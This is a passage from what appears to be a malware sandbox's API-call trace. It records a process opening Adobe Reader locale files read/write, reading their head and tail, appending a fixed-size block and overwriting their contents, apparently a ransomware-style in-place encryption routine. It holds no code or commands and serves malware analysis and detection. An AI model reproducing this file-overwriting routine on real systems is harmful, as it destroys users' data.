[0085.852] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.852] ReleaseMutex (hMutex=0x168) returned 1 [0085.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.UKR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0085.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.UKR", cchWideChar=11, lpMultiByteStr=0x1f7342c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.UKR", lpUsedDefaultChar=0x0) returned 11 [0085.852] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.854] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x9000 [0085.855] ReadFile (in: hFile=0x1fc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.855] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x9000 [0085.856] WriteFile (in: hFile=0x1fc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.856] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0085.856] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea6888*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.856] CloseHandle (hObject=0x1fc) returned 1 [0085.857] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Reflow.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\reflow.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.857] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.857] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1200 [0085.858] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.858] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.858] ReleaseMutex (hMutex=0x168) returned 1 [0085.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Reflow.UKR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Reflow.UKR", cchWideChar=10, lpMultiByteStr=0x1f7352c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reflow.UKR", lpUsedDefaultChar=0x0) returned 10 [0085.858] ReadFile (in: hFile=0x1fc, lpBuffer=0x2665868, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x2d5f2bc*=0x1200, lpOverlapped=0x0) returned 1 [0085.860] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0085.861] WriteFile (in: hFile=0x1fc, lpBuffer=0x288ee18*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288ee18*, lpNumberOfBytesWritten=0x2d5f2d0*=0x1788, lpOverlapped=0x0) returned 1 [0085.861] CloseHandle (hObject=0x1fc) returned 1 [0085.861] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Weblink.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\weblink.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.862] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.862] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6c00 [0085.862] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.862] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.862] ReleaseMutex (hMutex=0x168) returned 1 [0085.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.UKR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0085.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.UKR", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Weblink.UKR", lpUsedDefaultChar=0x0) returned 11 [0085.863] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.866] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5c00 [0085.866] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.866] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5c00 [0085.866] WriteFile (in: hFile=0x1fc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.867] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0085.867] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.867] CloseHandle (hObject=0x1fc) returned 1 [0085.868] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\DVA.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\dva.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.868] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.869] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2e00 [0085.869] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0085.869] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.869] ReleaseMutex (hMutex=0x168) returned 1 [0085.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.CHS", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0085.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.CHS", cchWideChar=7, lpMultiByteStr=0x1f7aa8c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.CHS", lpUsedDefaultChar=0x0) returned 7 [0085.869] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.130] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1e00 [0086.130] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.130] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1e00 [0086.131] WriteFile (in: hFile=0x1fc, lpBuffer=0x26663c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26663c8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.131] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0086.132] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0086.132] CloseHandle (hObject=0x1fc) returned 1 [0086.132] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\RdLang32.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\rdlang32.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0086.133] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.133] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xe0600 [0086.133] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.133] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.134] ReleaseMutex (hMutex=0x168) returned 1 [0086.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.CHS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.CHS", cchWideChar=12, lpMultiByteStr=0x1f7342c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.CHS", lpUsedDefaultChar=0x0) returned 12 [0086.134] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0086.137] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.138] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xdf600 [0086.138] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.141] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xdf600 [0086.142] WriteFile (in: hFile=0x1fc, lpBuffer=0x28a19a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a19a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.142] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0086.142] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0086.142] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0086.143] CloseHandle (hObject=0x1fc) returned 1 [0086.143] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Spelling.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\spelling.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0086.145] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.145] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2000 [0086.145] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.145] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.145] ReleaseMutex (hMutex=0x168) returned 1 [0086.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.CHS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.CHS", cchWideChar=12, lpMultiByteStr=0x1f7360c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.CHS", lpUsedDefaultChar=0x0) returned 12 [0086.145] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0086.147] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0086.148] WriteFile (in: hFile=0x1fc, lpBuffer=0x2888e18*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2888e18*, lpNumberOfBytesWritten=0x2d5f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0086.148] CloseHandle (hObject=0x1fc) returned 1 [0086.149] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Checkers.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\checkers.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0086.149] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.150] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x13200 [0086.150] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.150] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.150] ReleaseMutex (hMutex=0x168) returned 1 [0086.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.CHT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.CHT", cchWideChar=12, lpMultiByteStr=0x1f7328c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.CHT", lpUsedDefaultChar=0x0) returned 12 [0086.150] ReadFile (in: hFile=0x1fc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0086.153] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x12200 [0086.153] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.154] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x12200 [0086.154] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.154] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0086.154] WriteFile (in: hFile=0x1fc, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0086.154] CloseHandle (hObject=0x1fc) returned 1 [0086.155] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\pddom.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\pddom.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0086.156] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.156] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2200 [0086.156] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.156] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.156] ReleaseMutex (hMutex=0x168) returned 1 [0086.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.CHT", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0086.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.CHT", cchWideChar=9, lpMultiByteStr=0x1f7360c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pddom.CHT", lpUsedDefaultChar=0x0) returned 9 [0086.156] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.162] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1200 [0086.162] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.162] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1200 [0086.162] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.163] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0086.163] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0086.163] CloseHandle (hObject=0x1fc) returned 1 [0086.164] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0086.164] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.165] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x893f [0086.165] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.165] WaitForSingleObject (hHandle=0x168, 